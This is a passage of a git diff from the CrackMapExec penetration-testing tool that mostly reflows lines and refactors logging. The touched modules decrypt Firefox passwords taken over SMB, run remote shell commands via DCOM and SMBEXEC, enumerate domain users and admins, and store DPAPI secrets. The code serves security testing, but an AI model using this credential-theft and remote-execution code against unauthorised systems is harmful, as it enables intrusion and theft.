~/.cme/workspaces/ ~/old_cme_workspaces/`)\n" "[-] Then remove the CME DB folders (`rm -rf ~/.cme/workspaces/`) and rerun CME to initialize the new DB schema") exit() def shutdown_db(self): @@ -275,9 +252,7 @@ class database: # TODO: find a way to abstract this away to a single Upsert call q = Insert(self.HostsTable) # .returning(self.HostsTable.c.id) update_columns = {col.name: col for col in q.excluded if col.name not in "id"} - q = q.on_conflict_do_update( - index_elements=self.HostsTable.primary_key, set_=update_columns - ) + q = q.on_conflict_do_update(index_elements=self.HostsTable.primary_key, set_=update_columns) self.conn.execute(q, hosts) # .scalar() # we only return updated IDs for now - when RETURNING clause is allowed we can return inserted @@ -285,9 +260,7 @@ class database: cme_logger.debug(f"add_host() - Host IDs Updated: {updated_ids}") return updated_ids - def add_credential( - self, credtype, domain, username, password, group_id=None, pillaged_from=None - ): + def add_credential(self, credtype, domain, username, password, group_id=None, pillaged_from=None): """ Check if this credential has already been added to the database, if not add it in. """ @@ -295,9 +268,7 @@ class database: credentials = [] groups = [] - if (group_id and not self.is_group_valid(group_id)) or ( - pillaged_from and not self.is_host_valid(pillaged_from) - ): + if (group_id and not self.is_group_valid(group_id)) or (pillaged_from and not self.is_host_valid(pillaged_from)): cme_logger.debug(f"Invalid group or host") return @@ -344,12 +315,8 @@ class database: # TODO: find a way to abstract this away to a single Upsert call q_users = Insert(self.UsersTable) # .returning(self.UsersTable.c.id) - update_columns_users = { - col.name: col for col in q_users.excluded if col.name not in "id" - } - q_users = q_users.on_conflict_do_update( - index_elements=self.UsersTable.primary_key, set_=update_columns_users - ) + update_columns_users = {col.name: col for col in q_users.excluded if col.name not in "id"} + q_users = q_users.on_conflict_do_update(index_elements=self.UsersTable.primary_key, set_=update_columns_users) cme_logger.debug(f"Adding credentials: {credentials}") self.conn.execute(q_users, credentials) # .scalar() @@ -408,13 +375,9 @@ class database: def get_admin_relations(self, user_id=None, host_id=None): if user_id: - q = select(self.AdminRelationsTable).filter( - self.AdminRelationsTable.c.userid == user_id - ) + q = select(self.AdminRelationsTable).filter(self.AdminRelationsTable.c.userid == user_id) elif host_id: - q = select(self.AdminRelationsTable).filter( - self.AdminRelationsTable.c.hostid == host_id - ) + q = select(self.AdminRelationsTable).filter(self.AdminRelationsTable.c.hostid == host_id) else: q = select(self.AdminRelationsTable) @@ -454,9 +417,7 @@ class database: # if we're filtering by username elif filter_term and filter_term != "": like_term = func.lower(f"%{filter_term}%") - q = select(self.UsersTable).filter( - func.lower(self.UsersTable.c.username).like(like_term) - ) + q = select(self.UsersTable).filter(func.lower(self.UsersTable.c.username).like(like_term)) # otherwise return all credentials else: q = select(self.UsersTable) @@ -477,15 +438,11 @@ class database: return results.id def is_credential_local(self, credential_id): - q = select(self.UsersTable.c.domain).filter( - self.UsersTable.c.id == credential_id - ) + q = select(self.UsersTable.c.domain).filter(self.UsersTable.c.id == credential_id) user_domain = self.conn.execute(q).all() if user_domain: - q = select(self.HostsTable).filter( - func.lower(self.HostsTable.c.id) == func.lower(user_domain) - ) + q = select(self.HostsTable).filter(func.lower(self.HostsTable.c.id) == func.lower(user_domain)) results = self.conn.execute(q).all() return len(results) > 0 @@ -531,10 +488,7 @@ class database: # if we're filtering by ip/hostname elif filter_term and filter_term != "": like_term = func.lower(f"%{filter_term}%") - q = q.filter( - self.HostsTable.c.ip.like(like_term) - | func.lower(self.HostsTable.c.hostname).like(like_term) - ) + q = q.filter(self.HostsTable.c.ip.like(like_term) | func.lower(self.HostsTable.c.hostname).like(like_term)) results = self.conn.execute(q).all() cme_logger.debug(f"smb hosts() - results: {results}") return results @@ -578,9 +532,7 @@ class database: q = Insert(self.GroupsTable) self.conn.execute(q, groups) - new_group_data = self.get_groups( - group_name=group_data["name"], group_domain=group_data["domain"] - ) + new_group_data = self.get_groups(group_name=group_data["name"], group_domain=group_data["domain"]) returned_id = [new_group_data[0].id] cme_logger.debug(f"Inserted group with ID: {returned_id[0]}") return returned_id @@ -608,9 +560,7 @@ class database: # TODO: find a way to abstract this away to a single Upsert call q = Insert(self.GroupsTable) # .returning(self.GroupsTable.c.id) update_columns = {col.name: col for col in q.excluded if col.name not in "id"} - q = q.on_conflict_do_update( - index_elements=self.GroupsTable.primary_key, set_=update_columns - ) + q = q.on_conflict_do_update(index_elements=self.GroupsTable.primary_key, set_=update_columns) self.conn.execute(q, groups) # TODO: always return a list and fix code references to not expect a single integer @@ -648,9 +598,7 @@ class database: results = self.conn.execute(q).all() - cme_logger.debug( - f"get_groups(filter_term={filter_term}, groupName={group_name}, groupDomain={group_domain}) => {results}" - ) + cme_logger.debug(f"get_groups(filter_term={filter_term}, groupName={group_name}, groupDomain={group_domain}) => {results}") return results def get_group_relations(self, user_id=None, group_id=None): @@ -660,13 +608,9 @@ class database: self.GroupRelationsTable.c.groupid == group_id, ) elif user_id: - q = select(self.GroupRelationsTable).filter( - self.GroupRelationsTable.c.id == user_id - ) + q = select(self.GroupRelationsTable).filter(self.GroupRelationsTable.c.id == user_id) elif group_id: - q = select(self.GroupRelationsTable).filter( - self.GroupRelationsTable.c.groupid == group_id - ) + q = select(self.GroupRelationsTable).filter(self.GroupRelationsTable.c.groupid == group_id) results = self.conn.execute(q).all() return results @@ -730,9 +674,7 @@ class database: "write": write, } share_id = self.conn.execute( - Insert( - self.SharesTable - ).on_conflict_do_nothing(), # .returning(self.SharesTable.c.id), + Insert(self.SharesTable).on_conflict_do_nothing(), # .returning(self.SharesTable.c.id), share_data, ) # .scalar_one() # return share_id @@ -762,9 +704,7 @@ class database: def get_users_with_share_access(self, host_id, share_name, permissions): permissions = permissions.lower() - q = select(self.SharesTable.c.userid).filter( - self.SharesTable.c.name == share_name, self.SharesTable.c.hostid == host_id - ) + q = select(self.SharesTable.c.userid).filter(self.SharesTable.c.name == share_name, self.SharesTable.c.hostid == host_id) if "r" in permissions: q = q.filter(self.SharesTable.c.read == 1) if "w" in permissions: @@ -779,9 +719,7 @@ class database: :domain is the domain fqdn :pvk is the domain backupkey """ - q = select(self.DpapiBackupkey).filter( - func.lower(self.DpapiBackupkey.c.domain) == func.lower(domain) - ) + q = select(self.DpapiBackupkey).filter(func.lower(self.DpapiBackupkey.c.domain) == func.lower(domain)) results = self.conn.execute(q).all() if not len(results): @@ -792,9 +730,7 @@ class database: q = Insert(self.DpapiBackupkey) # .returning(self.DpapiBackupkey.c.id) self.conn.execute(q, [backup_key]) # .scalar() - cme_logger.debug( - f"add_domain_backupkey(domain={domain}, pvk={pvk_encoded})" - ) + cme_logger.debug(f"add_domain_backupkey(domain={domain}, pvk={pvk_encoded})") # return inserted_id except Exception as e: cme_logger.debug(f"Issue while inserting DPAPI Backup Key: {e}") @@ -812,10 +748,7 @@ class database: cme_logger.debug(f"get_domain_backupkey(domain={domain}) => {results}") if len(results) > 0: - results = [ - (id_key, domain, base64.b64decode(pvk)) - for id_key, domain, pvk in results - ] + results = [(id_key, domain, base64.b64decode(pvk)) for id_key, domain, pvk in results] return results def is_dpapi_secret_valid(self, dpapi_secret_id): @@ -823,9 +756,7 @@ class database: Check if this group ID is valid. :dpapi_secret_id is a primary id """ - q = select(self.DpapiSecrets).filter( - func.lower(self.DpapiSecrets.c.id) == dpapi_secret_id - ) + q = select(self.DpapiSecrets).filter(func.lower(self.DpapiSecrets.c.id) == dpapi_secret_id) results = self.conn.execute(q).first() valid = True if results is not None else False cme_logger.debug(f"is_dpapi_secret_valid(groupID={dpapi_secret_id}) => {valid}") @@ -851,18 +782,14 @@ class database: "password": password, "url": url, } - q = Insert( - self.DpapiSecrets - ).on_conflict_do_nothing() # .returning(self.DpapiSecrets.c.id) + q = Insert(self.DpapiSecrets).on_conflict_do_nothing() # .returning(self.DpapiSecrets.c.id) self.conn.execute(q, [secret]) # .scalar() # inserted_result = res_inserted_result.first() # inserted_id = inserted_result.id - cme_logger.debug( - f"add_dpapi_secrets(host={host}, dpapi_type={dpapi_type}, windows_user={windows_user}, username={username}, password={password}, url={url})" - ) + cme_logger.debug(f"add_dpapi_secrets(host={host}, dpapi_type={dpapi_type}, windows_user={windows_user}, username={username}, password={password}, url={url})") def get_dpapi_secrets( self, @@ -889,9 +816,7 @@ class database: # all() returns a list, so we keep the return format the same so consumers don't have to guess return [results] elif dpapi_type: - q = q.filter( - func.lower(self.DpapiSecrets.c.dpapi_type) == func.lower(dpapi_type) - ) + q = q.filter(func.lower(self.DpapiSecrets.c.dpapi_type) == func.lower(dpapi_type)) elif windows_user: like_term = func.lower(f"%{windows_user}%") q = q.filter(func.lower(self.DpapiSecrets.c.windows_user).like(like_term)) @@ -902,9 +827,7 @@ class database: q = q.filter(func.lower(self.DpapiSecrets.c.url) == func.lower(url)) results = self.conn.execute(q).all() - cme_logger.debug( - f"get_dpapi_secrets(filter_term={filter_term}, host={host}, dpapi_type={dpapi_type}, windows_user={windows_user}, username={username}, url={url}) => {results}" - ) + cme_logger.debug(f"get_dpapi_secrets(filter_term={filter_term}, host={host}, dpapi_type={dpapi_type}, windows_user={windows_user}, username={username}, url={url}) => {results}") return results def add_loggedin_relation(self, user_id, host_id): @@ -920,23 +843,17 @@ class database: try: cme_logger.debug(f"Inserting loggedin_relations: {relation}") # TODO: find a way to abstract this away to a single Upsert call - q = Insert( - self.LoggedinRelationsTable - ) # .returning(self.LoggedinRelationsTable.c.id) + q = Insert(self.LoggedinRelationsTable) # .returning(self.LoggedinRelationsTable.c.id) self.conn.execute(q, [relation]) # .scalar() inserted_id_results = self.get_loggedin_relations(user_id, host_id) - cme_logger.debug( - f"Checking if relation was added: {inserted_id_results}" - ) + cme_logger.debug(f"Checking if relation was added: {inserted_id_results}") return inserted_id_results[0].id except Exception as e: cme_logger.debug(f"Error inserting LoggedinRelation: {e}") def get_loggedin_relations(self, user_id=None, host_id=None): - q = select( - self.LoggedinRelationsTable - ) # .returning(self.LoggedinRelationsTable.c.id) + q = select(self.LoggedinRelationsTable) # .returning(self.LoggedinRelationsTable.c.id) if user_id: q = q.filter(self.LoggedinRelationsTable.c.userid == user_id) if host_id: diff --git a/cme/protocols/smb/db_navigator.py b/cme/protocols/smb/db_navigator.py index c891d0af..5b96d573 100644 --- a/cme/protocols/smb/db_navigator.py +++ b/cme/protocols/smb/db_navigator.py @@ -51,9 +51,7 @@ class navigator(DatabaseNavigator): members = len(self.db.get_group_relations(group_id=group_id)) ad_members = group[4] last_query_time = group[5] - data.append( - [group_id, domain, name, rid, members, ad_members, last_query_time] - ) + data.append([group_id, domain, name, rid, members, ad_members, last_query_time]) print_table(data, title="Groups") # pull/545 @@ -126,12 +124,8 @@ class navigator(DatabaseNavigator): name = share[3] remark = share[4] - users_r_access = self.db.get_users_with_share_access( - host_id=host_id, share_name=name, permissions="r" - ) - users_w_access = self.db.get_users_with_share_access( - host_id=host_id, share_name=name, permissions="w" - ) + users_r_access = self.db.get_users_with_share_access(host_id=host_id, share_name=name, permissions="r") + users_w_access = self.db.get_users_with_share_access(host_id=host_id, share_name=name, permissions="w") data.append( [ share_id, @@ -165,12 +159,8 @@ class navigator(DatabaseNavigator): name = share[3] remark = share[4] - users_r_access = self.db.get_users_with_share_access( - host_id=host_id, share_name=name, permissions="r" - ) - users_w_access = self.db.get_users_with_share_access( - host_id=host_id, share_name=name, permissions="w" - ) + users_r_access = self.db.get_users_with_share_access(host_id=host_id, share_name=name, permissions="r") + users_w_access = self.db.get_users_with_share_access(host_id=host_id, share_name=name, permissions="w") data = [["ShareID", "Name", "Remark"], [share_id, name, remark]] print_table(data, title="Share") @@ -266,9 +256,7 @@ class navigator(DatabaseNavigator): creds = self.db.get_credentials(filter_term=userid) for cred in creds: - data.append( - [cred[0], cred[4], cred[5], cred[1], cred[2], cred[3]] - ) + data.append([cred[0], cred[4], cred[5], cred[1], cred[2], cred[3]]) print_table(data, title="Member(s)") def help_groups(self): @@ -644,13 +632,7 @@ class navigator(DatabaseNavigator): print_help(help_string) def do_clear_database(self, line): - if ( - input( - "This will destroy all data in the current database, are you SURE you" - " want to run this? (y/n): " - ) - == "y" - ): + if input("This will destroy all data in the current database, are you SURE you" " want to run this? (y/n): ") == "y": self.db.clear_database() def help_clear_database(self): diff --git a/cme/protocols/smb/firefox.py b/cme/protocols/smb/firefox.py index 9942ef97..bd889aa6 100644 --- a/cme/protocols/smb/firefox.py +++ b/cme/protocols/smb/firefox.py @@ -62,42 +62,24 @@ class FirefoxTriage: users = self.get_users() for user in users: try: - directories = self.conn.remote_list_dir( - share=self.share, path=self.firefox_generic_path.format(user) - ) + directories = self.conn.remote_list_dir(share=self.share, path=self.firefox_generic_path.format(user)) except Exception as e: if "STATUS_OBJECT_PATH_NOT_FOUND" in str(e): continue self.logger.debug(e) if directories is None: continue - for d in [ - d - for d in directories - if d.get_longname() not in self.false_positive and d.is_directory() > 0 - ]: + for d in [d for d in directories if d.get_longname() not in self.false_positive and d.is_directory() > 0]: try: - logins_path = ( - self.firefox_generic_path.format(user) - + "\\" - + d.get_longname() - + "\\logins.json" - ) + logins_path = self.firefox_generic_path.format(user) + "\\" + d.get_longname() + "\\logins.json" logins_data = self.conn.readFile(self.share, logins_path) if logins_data is None: continue # No logins.json file found logins = self.get_login_data(logins_data=logins_data) if len(logins) == 0: continue # No logins profile found - key4_path = ( - self.firefox_generic_path.format(user) - + "\\" - + d.get_longname() - + "\\key4.db" - ) - key4_data = self.conn.readFile( - self.share, key4_path, bypass_shared_violation=True - ) + key4_path = self.firefox_generic_path.format(user) + "\\" + d.get_longname() + "\\key4.db" + key4_data = self.conn.readFile(self.share, key4_path, bypass_shared_violation=True) if key4_data is None: continue key = self.get_key(key4_data=key4_data) @@ -109,12 +91,8 @@ class FirefoxTriage: if key is None: continue for username, pwd, host in logins: - decoded_username = self.decrypt( - key=key, iv=username[1], ciphertext=username[2] - ).decode("utf-8") - password = self.decrypt( - key=key, iv=pwd[1], ciphertext=pwd[2] - ).decode("utf-8") + decoded_username = self.decrypt(key=key, iv=username[1], ciphertext=username[2]).decode("utf-8") + password = self.decrypt(key=key, iv=pwd[1], ciphertext=pwd[2]).decode("utf-8") if password is not None and decoded_username is not None: firefox_data.append( FirefoxData( @@ -154,9 +132,7 @@ class FirefoxTriage: row = next(cursor) if row: - global_salt, master_password, _ = self.is_master_password_correct( - key_data=row, master_password=master_password - ) + global_salt, master_password, _ = self.is_master_password_correct(key_data=row, master_password=master_password) if global_salt: try: cursor.execute("SELECT a11,a102 FROM nssPrivate;") @@ -167,9 +143,7 @@ class FirefoxTriage: a102 = row[1] if a102 == CKA_ID: decoded_a11 = decoder.decode(a11) - key = self.decrypt_3des( - decoded_a11, master_password, global_salt - ) + key = self.decrypt_3des(decoded_a11, master_password, global_salt) if key is not None: fh.close() return key[:24] @@ -185,9 +159,7 @@ class FirefoxTriage: global_salt = key_data[0] # Item1 item2 = key_data[1] decoded_item2 = decoder.decode(item2) - cleartext_data = self.decrypt_3des( - decoded_item2, master_password, global_salt - ) + cleartext_data = self.decrypt_3des(decoded_item2, master_password, global_salt) if cleartext_data != "password-check\x02\x02".encode(): return "", "", "" return global_salt, master_password, entry_salt @@ -199,9 +171,7 @@ class FirefoxTriage: users = list() users_dir_path = "Users\\*" - directories = self.conn.listPath( - shareName=self.share, path=ntpath.normpath(users_dir_path) - ) + directories = self.conn.listPath(shareName=self.share, path=ntpath.normpath(users_dir_path)) for d in directories: if d.get_longname() not in self.false_positive and d.is_directory() > 0: @@ -264,9 +234,7 @@ class FirefoxTriage: assert key_length == 32 k = sha1(global_salt + master_password).digest() - key = pbkdf2_hmac( - "sha256", k, entry_salt, iteration_count, dklen=key_length - ) + key = pbkdf2_hmac("sha256", k, entry_salt, iteration_count, dklen=key_length) # https://hg.mozilla.org/projects/nss/rev/fc636973ad06392d11597620b602779b4af312f6#l6.49 iv = b"\x04\x0e" + decoded_item[0][0][1][1][1].asOctets() diff --git a/cme/protocols/smb/mmcexec.py b/cme/protocols/smb/mmcexec.py index 8ffb0d89..39b049ba 100644 --- a/cme/protocols/smb/mmcexec.py +++ b/cme/protocols/smb/mmcexec.py @@ -60,9 +60,7 @@ from impacket.dcerpc.v5.dtypes import NULL class MMCEXEC: - def __init__( - self, host, share_name, username, password, domain, smbconnection, hashes=None - ): + def __init__(self, host, share_name, username, password, domain, smbconnection, hashes=None): self.__host = host self.__username = username self.__password = password @@ -92,9 +90,7 @@ class MMCEXEC: oxidResolver=True, ) try: - iInterface = dcom.CoCreateInstanceEx( - string_to_bin("49B2791A-B1AE-4C90-9B8E-E860BA07F889"), IID_IDispatch - ) + iInterface = dcom.CoCreateInstanceEx(string_to_bin("49B2791A-B1AE-4C90-9B8E-E860BA07F889"), IID_IDispatch) iMMC = IDispatch(iInterface) resp = iMMC.GetIDsOfNames(("Document",)) @@ -104,28 +100,14 @@ class MMCEXEC: dispParams["rgdispidNamedArgs"] = NULL dispParams["cArgs"] = 0 dispParams["cNamedArgs"] = 0 - resp = iMMC.Invoke( - resp[0], 0x409, DISPATCH_PROPERTYGET, dispParams, 0, [], [] - ) + resp = iMMC.Invoke(resp[0], 0x409, DISPATCH_PROPERTYGET, dispParams, 0, [], []) - iDocument = IDispatch( - self.getInterface( - iMMC, resp["pVarResult"]["_varUnion"]["pdispVal"]["abData"] - ) - ) + iDocument = IDispatch(self.getInterface(iMMC, resp["pVarResult"]["_varUnion"]["pdispVal"]["abData"])) resp = iDocument.GetIDsOfNames(("ActiveView",)) - resp = iDocument.Invoke( - resp[0], 0x409, DISPATCH_PROPERTYGET, dispParams, 0, [], [] - ) + resp = iDocument.Invoke(resp[0], 0x409, DISPATCH_PROPERTYGET, dispParams, 0, [], []) - iActiveView = IDispatch( - self.getInterface( - iMMC, resp["pVarResult"]["_varUnion"]["pdispVal"]["abData"] - ) - ) - pExecuteShellCommand = iActiveView.GetIDsOfNames(("ExecuteShellCommand",))[ - 0 - ] + iActiveView = IDispatch(self.getInterface(iMMC, resp["pVarResult"]["_varUnion"]["pdispVal"]["abData"])) + pExecuteShellCommand = iActiveView.GetIDsOfNames(("ExecuteShellCommand",))[0] pQuit = iMMC.GetIDsOfNames(("Quit",))[0] @@ -177,9 +159,7 @@ class MMCEXEC: dispParams["cArgs"] = 0 dispParams["cNamedArgs"] = 0 - self.__quit[0].Invoke( - self.__quit[1], 0x409, DISPATCH_METHOD, dispParams, 0, [], [] - ) + self.__quit[0].Invoke(self.__quit[1], 0x409, DISPATCH_METHOD, dispParams, 0, [], []) return True def execute_remote(self, data): @@ -188,11 +168,7 @@ class MMCEXEC: command = "/Q /c " + data if self.__retOutput is True: - command += ( - " 1> " - + f"\\\\{local_ip}\\{self.__share_name}\\{self.__output}" - + " 2>&1" - ) + command += " 1> " + f"\\\\{local_ip}\\{self.__share_name}\\{self.__output}" + " 2>&1" dispParams = DISPPARAMS(None, False) dispParams["rgdispidNamedArgs"] = NULL @@ -226,9 +202,7 @@ class MMCEXEC: dispParams["rgvarg"].append(arg1) dispParams["rgvarg"].append(arg0) - self.__executeShellCommand[0].Invoke( - self.__executeShellCommand[1], 0x409, DISPATCH_METHOD, dispParams, 0, [], [] - ) + self.__executeShellCommand[0].Invoke(self.__executeShellCommand[1], 0x409, DISPATCH_METHOD, dispParams, 0, [], []) self.get_output_fileless() def output_callback(self, data): @@ -240,9 +214,7 @@ class MMCEXEC: while True: try: - with open( - path_join("/tmp", "cme_hosted", self.__output), "r" - ) as output: + with open(path_join("/tmp", "cme_hosted", self.__output), "r") as output: self.output_callback(output.read()) break except IOError: diff --git a/cme/protocols/smb/passpol.py b/cme/protocols/smb/passpol.py index ea8bf592..b519708f 100644 --- a/cme/protocols/smb/passpol.py +++ b/cme/protocols/smb/passpol.py @@ -71,12 +71,8 @@ class PassPolDump: } def __init__(self, connection): - self.logger = cme_logger - self.addr = ( - connection.host - if not connection.kerberos - else connection.hostname + "." + connection.domain - ) + self.logger = connection.logger + self.addr = connection.host if not connection.kerberos else connection.hostname + "." + connection.domain self.protocol = connection.args.port self.username = connection.username self.password = connection.password @@ -176,9 +172,7 @@ class PassPolDump: domainInformationClass=samr.DOMAIN_INFORMATION_CLASS.DomainPasswordInformation, ) self.__min_pass_len = re["Buffer"]["Password"]["MinPasswordLength"] or "None" - self.__pass_hist_len = ( - re["Buffer"]["Password"]["PasswordHistoryLength"] or "None" - ) + self.__pass_hist_len = re["Buffer"]["Password"]["PasswordHistoryLength"] or "None" self.__max_pass_age = convert( int(re["Buffer"]["Password"]["MaxPasswordAge"]["LowPart"]), int(re["Buffer"]["Password"]["MaxPasswordAge"]["HighPart"]), @@ -194,12 +188,8 @@ class PassPolDump: domainHandle=domainHandle, domainInformationClass=samr.DOMAIN_INFORMATION_CLASS.DomainLockoutInformation, ) - self.__rst_accnt_lock_counter = convert( - 0, re["Buffer"]["Lockout"]["LockoutObservationWindow"], lockout=True - ) - self.__lock_accnt_dur = convert( - 0, re["Buffer"]["Lockout"]["LockoutDuration"], lockout=True - ) + self.__rst_accnt_lock_counter = convert(0, re["Buffer"]["Lockout"]["LockoutObservationWindow"], lockout=True) + self.__lock_accnt_dur = convert(0, re["Buffer"]["Lockout"]["LockoutDuration"], lockout=True) self.__accnt_lock_thres = re["Buffer"]["Lockout"]["LockoutThreshold"] or "None" re = samr.hSamrQueryInformationDomain2( @@ -240,26 +230,20 @@ class PassPolDump: for domain in self.__domains: cme_logger.debug(f"{domain['Name']}") - self.logger.success( - f"Dumping password info for domain: {self.__domains[0]['Name']}" - ) + self.logger.success(f"Dumping password info for domain: {self.__domains[0]['Name']}") self.logger.highlight(f"Minimum password length: {self.__min_pass_len}") self.logger.highlight(f"Password history length: {self.__pass_hist_len}") self.logger.highlight(f"Maximum password age: {self.__max_pass_age}") self.logger.highlight("") - self.logger.highlight( - f"Password Complexity Flags: {self.__pass_prop or 'None'}" - ) + self.logger.highlight(f"Password Complexity Flags: {self.__pass_prop or 'None'}") for i, a in enumerate(self.__pass_prop): self.logger.highlight(f"\t{PASSCOMPLEX[i]} {str(a)}") self.logger.highlight("") self.logger.highlight(f"Minimum password age: {self.__min_pass_age}") - self.logger.highlight( - f"Reset Account Lockout Counter: {self.__rst_accnt_lock_counter}" - ) + self.logger.highlight(f"Reset Account Lockout Counter: {self.__rst_accnt_lock_counter}") self.logger.highlight(f"Locked Account Duration: {self.__lock_accnt_dur}") self.logger.highlight(f"Account Lockout Threshold: {self.__accnt_lock_thres}") self.logger.highlight(f"Forced Log off Time: {self.__force_logoff_time}") diff --git a/cme/protocols/smb/remotefile.py b/cme/protocols/smb/remotefile.py index 8d85d54a..370ccfa0 100644 --- a/cme/protocols/smb/remotefile.py +++ b/cme/protocols/smb/remotefile.py @@ -20,9 +20,7 @@ class RemoteFile: self.__currentOffset = 0 def open(self): - self.__fid = self.__smbConnection.openFile( - self.__tid, self.__fileName, desiredAccess=self.__access - ) + self.__fid = self.__smbConnection.openFile(self.__tid, self.__fileName, desiredAccess=self.__access) def seek(self, offset, whence): # Implement whence, for now it's always from the beginning of the file @@ -31,9 +29,7 @@ class RemoteFile: def read(self, bytesToRead): if bytesToRead > 0: - data = self.__smbConnection.readFile( - self.__tid, self.__fid, self.__currentOffset, bytesToRead - ) + data = self.__smbConnection.readFile(self.__tid, self.__fid, self.__currentOffset, bytesToRead) self.__currentOffset += len(data) return data return "" diff --git a/cme/protocols/smb/samrfunc.py b/cme/protocols/smb/samrfunc.py index 8ba8a910..623a1728 100644 --- a/cme/protocols/smb/samrfunc.py +++ b/cme/protocols/smb/samrfunc.py @@ -16,12 +16,8 @@ from cme.logger import cme_logger class SamrFunc: def __init__(self, connection): - self.logger = cme_logger - self.addr = ( - connection.host - if not connection.kerberos - else connection.hostname + "." + connection.domain - ) + self.logger = connection.logger + self.addr = connection.host if not connection.kerberos else connection.hostname + "." + connection.domain self.protocol = connection.args.port self.username = connection.username self.password = connection.password @@ -54,6 +50,7 @@ class SamrFunc: remote_name=self.addr, remote_host=self.addr, kerberos=self.doKerberos, + logger=self.logger ) def get_builtin_groups(self): @@ -90,14 +87,10 @@ class SamrFunc: def get_local_administrators(self): self.get_builtin_groups() if "Administrators" in self.groups: - self.logger.success( - f"Found Local Administrators group: RID {self.groups['Administrators']}" - ) + self.logger.success(f"Found Local Administrators group: RID {self.groups['Administrators']}") domain_handle = self.samr_query.get_domain_handle("Builtin") self.logger.debug(f"Querying group members") - member_sids = self.samr_query.get_alias_members( - domain_handle, self.groups["Administrators"] - ) + member_sids = self.samr_query.get_alias_members(domain_handle, self.groups["Administrators"]) member_names = self.lsa_query.lookup_sids(member_sids) for sid, name in zip(member_sids, member_names): @@ -181,12 +174,8 @@ class SAMRQuery: return domain_names def get_domain_handle(self, domain_name): - resp = samr.hSamrLookupDomainInSamServer( - self.dce, self.server_handle, domain_name - ) - resp = samr.hSamrOpenDomain( - self.dce, serverHandle=self.server_handle, domainId=resp["DomainId"] - ) + resp = samr.hSamrLookupDomainInSamServer(self.dce, self.server_handle, domain_name) + resp = samr.hSamrOpenDomain(self.dce, serverHandle=self.server_handle, domainId=resp["DomainId"]) return resp["DomainHandle"] def get_domain_aliases(self, domain_handle): @@ -197,9 +186,7 @@ class SAMRQuery: return aliases def get_alias_handle(self, domain_handle, alias_id): - resp = samr.hSamrOpenAlias( - self.dce, domain_handle, desiredAccess=MAXIMUM_ALLOWED, aliasId=alias_id - ) + resp = samr.hSamrOpenAlias(self.dce, domain_handle, desiredAccess=MAXIMUM_ALLOWED, aliasId=alias_id) return resp["AliasHandle"] def get_alias_members(self, domain_handle, alias_id): @@ -221,6 +208,7 @@ class LSAQuery: remote_name="", remote_host="", kerberos=None, + logger=None ): self.__username = username self.__password = password @@ -234,7 +222,7 @@ class LSAQuery: self.__kerberos = kerberos self.dce = self.get_dce() self.policy_handle = self.get_policy_handle() - self.logger = cme_logger + self.logger = logger def get_transport(self): string_binding = f"ncacn_np:{self.__remote_name}[\\pipe\\lsarpc]" @@ -269,15 +257,11 @@ class LSAQuery: return dce def get_policy_handle(self): - resp = lsad.hLsarOpenPolicy2( - self.dce, MAXIMUM_ALLOWED | lsat.POLICY_LOOKUP_NAMES - ) + resp = lsad.hLsarOpenPolicy2(self.dce, MAXIMUM_ALLOWED | lsat.POLICY_LOOKUP_NAMES) return resp["PolicyHandle"] def lookup_sids(self, sids): - resp = lsat.hLsarLookupSids( - self.dce, self.policy_handle, sids, lsat.LSAP_LOOKUP_LEVEL.LsapLookupWksta - ) + resp = lsat.hLsarLookupSids(self.dce, self.policy_handle, sids, lsat.LSAP_LOOKUP_LEVEL.LsapLookupWksta) names = [] for translated_names in resp["TranslatedNames"]["Names"]: names.append(translated_names["Name"]) diff --git a/cme/protocols/smb/samruser.py b/cme/protocols/smb/samruser.py index 973ac6d9..8ac85835 100644 --- a/cme/protocols/smb/samruser.py +++ b/cme/protocols/smb/samruser.py @@ -7,8 +7,6 @@ from impacket.dcerpc.v5.rpcrt import DCERPCException from impacket.dcerpc.v5.rpcrt import DCERPC_v5 from impacket.nt_errors import STATUS_MORE_ENTRIES -from cme.logger import cme_logger - class UserSamrDump: KNOWN_PROTOCOLS = { @@ -17,12 +15,8 @@ class UserSamrDump: } def __init__(self, connection): - self.logger = cme_logger - self.addr = ( - connection.host - if not connection.kerberos - else connection.hostname + "." + connection.domain - ) + self.logger = connection.logger + self.addr = connection.host if not connection.kerberos else connection.hostname + "." + connection.domain self.protocol = connection.args.port self.username = connection.username self.password = connection.password @@ -116,9 +110,7 @@ class UserSamrDump: enumerationContext = 0 while status == STATUS_MORE_ENTRIES: try: - resp = samr.hSamrEnumerateUsersInDomain( - dce, domainHandle, enumerationContext=enumerationContext - ) + resp = samr.hSamrEnumerateUsersInDomain(dce, domainHandle, enumerationContext=enumerationContext) except DCERPCException as e: if str(e).find("STATUS_MORE_ENTRIES") < 0: self.logger.fail("Error enumerating domain user(s)") @@ -126,20 +118,14 @@ class UserSamrDump: resp = e.get_packet() self.logger.success("Enumerated domain user(s)") for user in resp["Buffer"]["Buffer"]: - r = samr.hSamrOpenUser( - dce, domainHandle, samr.MAXIMUM_ALLOWED, user["RelativeId"] - ) - info = samr.hSamrQueryInformationUser2( - dce, r["UserHandle"], samr.USER_INFORMATION_CLASS.UserAllInformation - ) + r = samr.hSamrOpenUser(dce, domainHandle, samr.MAXIMUM_ALLOWED, user["RelativeId"]) + info = samr.hSamrQueryInformationUser2(dce, r["UserHandle"], samr.USER_INFORMATION_CLASS.UserAllInformation) (username, uid, info_user) = ( user["Name"], user["RelativeId"], info["Buffer"]["All"], ) - self.logger.highlight( - f"{self.domain}\\{user['Name']:<30} {info_user['AdminComment']}" - ) + self.logger.highlight(f"{self.domain}\\{user['Name']:<30} {info_user['AdminComment']}") self.users.append(user["Name"]) samr.hSamrCloseHandle(dce, r["UserHandle"]) diff --git a/cme/protocols/smb/smbexec.py b/cme/protocols/smb/smbexec.py index bb94a064..cc0d7d9e 100755 --- a/cme/protocols/smb/smbexec.py +++ b/cme/protocols/smb/smbexec.py @@ -26,6 +26,7 @@ class SMBEXEC: hashes=None, share=None, port=445, + logger=cme_logger ): self.__host = host self.__share_name = "C$" @@ -50,7 +51,7 @@ class SMBEXEC: self.__aesKey = aesKey self.__doKerberos = doKerberos self.__kdcHost = kdcHost - self.logger = cme_logger + self.logger = logger if hashes is not None: # This checks to see if we didn't provide the LM Hash @@ -112,12 +113,7 @@ class SMBEXEC: self.__batchFile = gen_random_string(6) + ".bat" if self.__retOutput: - command = ( - self.__shell - + "echo " - + data - + f" ^> \\\\127.0.0.1\\{self.__share_name}\\{self.__output} 2^>^&1 > %TEMP%\{self.__batchFile} & %COMSPEC% /Q /c %TEMP%\{self.__batchFile} & %COMSPEC% /Q /c del %TEMP%\{self.__batchFile}" - ) + command = self.__shell + "echo " + data + f" ^> 